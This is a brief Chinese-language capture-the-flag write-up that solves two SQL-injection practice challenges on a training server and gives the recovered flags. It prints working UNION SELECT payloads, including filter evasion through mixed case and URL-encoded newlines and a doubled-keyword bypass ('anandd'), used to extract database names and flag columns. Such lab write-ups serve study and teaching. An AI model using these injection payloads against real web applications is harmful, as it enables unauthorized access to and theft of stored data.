两道sql练习题

1.注入得帅照!

地址:http://123.57.240.205:4002/

点击前往按钮会直接跳转到W4nder的博客,爆破可以得到一个hint(hone.php)
在这里插入图片描述
hone.php是这样的一个界面,可以开始注入
在这里插入图片描述

payload:id=9122399%27%20%0a%20UNion%20%0a%20SElect%20%0a%201,(SElect%20%0a%20flag%20%0a%20from%20%0a%20flag),2%20%0a%20and%20%0a%20%271%27=%271

在这里插入图片描述
得到了一个html页面,找到了flag(css特别好看)
在这里插入图片描述
flag在源码中被注释掉了
在这里插入图片描述

flag{W4nder_always_god}

2.对方的服务器漏洞口

地址:http://123.57.240.205:4001/check.php

在这里插入图片描述
这道题一开始卡了很久,我以为是有很多过滤,最后发现只有and和or
用anandd绕过就行
在这里插入图片描述
找到注入点以后就很好做了,常规操作就行

id=0 union select 1,database(),3,4

在这里插入图片描述

payload:id=0 union select 1,group_concat(flag),3,4 from flag

在这里插入图片描述
在这里插入图片描述

flag{plz_keep_striving_for_your_dream 😃}
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章